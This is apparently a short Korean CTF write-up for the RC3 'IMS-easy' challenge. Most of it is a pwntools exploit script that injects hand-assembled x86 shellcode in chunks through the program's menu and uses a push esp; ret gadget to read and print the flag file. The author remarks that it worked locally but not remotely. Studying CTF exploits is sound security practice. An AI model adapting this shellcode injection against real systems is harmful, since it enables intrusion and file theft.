RC3 CTF에서 낸 문제다.
쉘코드는 그냥 하드 코딩했다.
이상하게 로컬에서는 풀리는데 리모트로는 안풀린다 왜지 ㅂㄷ
어쨋든 아래는 사용한 페이로드
from pwn import *
import time
#con = process("IMS-easy")
#ims.ctf.rc3.club 7777
con = remote("ims.ctf.rc3.club", 7777)
#0x080bfb66 : push esp , ret
shellcode = "\x31\xc0"
shellcode += "\x50"
shellcode += "\x68\x2e\x74\x78\x74"
shellcode += "\x68\x66\x6c\x61\x67"
shellcode += "\x68\x61\x73\x79\x2f"
shellcode += "\x68\x4d\x53\x2d\x65"
shellcode += "\x68\x6d\x65\x2f\x49"
shellcode += "\x68\x2f\x2f\x68\x6f" # push /home/IMS-easy/flag.txt
shellcode += "\x89\xe3"
shellcode += "\x89\xc8"
shellcode += "\xb0\x05"
shellcode += "\xcd\x80" # open
shellcode += "\x89\xc3"
shellcode += "\xb9\xc0\x22\x0f\x08" # addr : 0x080f22c0(bss)
shellcode += "\x6a\x32"
shellcode += "\x5a"
shellcode += "\xb0\x03"
shellcode += "\xcd\x80" # read
shellcode += "\x6a\x01"
shellcode += "\x5b"
shellcode += "\xb9\xc0\x22\x0f\x08" # addr : 0x080f22c0(bss)
shellcode += "\x6a\x32"
shellcode += "\x5a"
shellcode += "\xb0\x04"
shellcode += "\xcd\x80" # write
payload = ""
for i in range(7):
print con.recvuntil("Choose: ")
con.sendline("1")
print con.recvuntil("ID: ")
con.sendline("135002982") # push esp, ret
print con.recvuntil("code: ")
con.sendline(p64(0x080bfb66080bfb66)) # dummy
payload += "1\n"
payload += "135002982\n"
payload += p64(0x080bfb66080bfb66) + "\n"
con.recvline()
con.recvline()
print con.recvuntil("Choose: ")
con.sendline("1")
print con.recvuntil("ID: ")
con.sendline(str(u32(shellcode[8:12])))
print con.recvuntil("code: ")
con.sendline(shellcode[0:8])
con.recvline()
con.recvline()
payload += "1\n"
payload += str(u32(shellcode[8:12])) + "\n"
payload += shellcode[0:8] + "\n"
print con.recvuntil("Choose: ")
con.sendline("1")
print con.recvuntil("ID: ")
con.sendline(str(u32(shellcode[20:24])))
print con.recvuntil("code: ")
con.sendline(shellcode[12:20])
con.recvline()
con.recvline()
payload += "1\n"
payload += str(u32(shellcode[20:24])) + "\n"
payload += shellcode[12:20] + "\n"
print con.recvuntil("Choose: ")
con.sendline("1")
print con.recvuntil("ID: ")
con.sendline(str(u32(shellcode[32:36])))
print con.recvuntil("code: ")
con.sendline(shellcode[24:32])
con.recvline()
con.recvline()
payload += "1\n"
payload += str(u32(shellcode[32:36])) + "\n"
payload += shellcode[24:32] + "\n"
print con.recvuntil("Choose: ")
con.sendline("1")
print con.recvuntil("ID: ")
con.sendline(str(u32(shellcode[44:48])))
print con.recvuntil("code: ")
con.sendline(shellcode[36:44])
con.recvline()
con.recvline()
payload += "1\n"
payload += str(u32(shellcode[44:48])) + "\n"
payload += shellcode[36:44] + "\n"
print con.recvuntil("Choose: ")
con.sendline("1")
print con.recvuntil("ID: ")
con.sendline(str(u32(shellcode[56:60])))
print con.recvuntil("code: ")
con.sendline(shellcode[48:56])
con.recvline()
con.recvline()
payload += "1\n"
payload += str(u32(shellcode[56:60])) + "\n"
payload += shellcode[48:56] + "\n"
print con.recvuntil("Choose: ")
con.sendline("1")
print con.recvuntil("ID: ")
con.sendline(str(0x9090cd80))
print con.recvuntil("code: ")
con.sendline(shellcode[60:68])
con.recvline()
con.recvline()
payload += "1\n"
payload += str(0x9090cd80) + "\n"
payload += shellcode[60:68] + "\n"
print con.recvuntil("Choose: ")
con.sendline("4")
payload += "4\n"
time.sleep(1)
con.interactive()
with open("./payload", "wb") as f:
f.write(payload)
con.close()
다시 풀어봤는데..
